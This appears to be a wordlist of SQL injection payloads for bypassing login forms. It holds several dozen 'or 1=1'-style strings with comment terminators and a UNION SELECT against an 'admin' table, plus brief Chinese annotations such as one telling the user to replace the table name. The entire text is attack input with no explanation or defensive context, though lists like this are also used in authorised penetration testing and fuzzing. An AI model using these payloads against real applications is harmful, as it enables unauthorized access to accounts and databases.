1'or'1'='1
密码*/'
admin'--
admin'/*
admin' or ''=''--
admin'or''='
admin' or 1=1--
admin' or 1=1/*
admin'or 1=1#
a'or' 1=1--
a'or'1=1--
"or"="
'or''='
'or'='1'
 or 1=1--
"or 1=1--
"or1=1--
'or 1=1
'or 1=1--
'or 1=1/*
'or' '1'='1'
'or1=1--
or 1=1--
or1=1--
"or 1=1%00
'OR 1=1%00
"or "a"="a
"or"="a'='a
') or ('a'='a
'.).or.('.a.'='.a
'.).or.('.a.'='.a 
'or"="a'='a
'or.'a.'='a
or 'a'='a'
"or=or"
''or'='or'
'or''=''or''='
'or'='or'
[passwd:] 1
[username:]' UNION Select 1,1,1 FROM admin Where ''=' （替换表名admin）
'xor
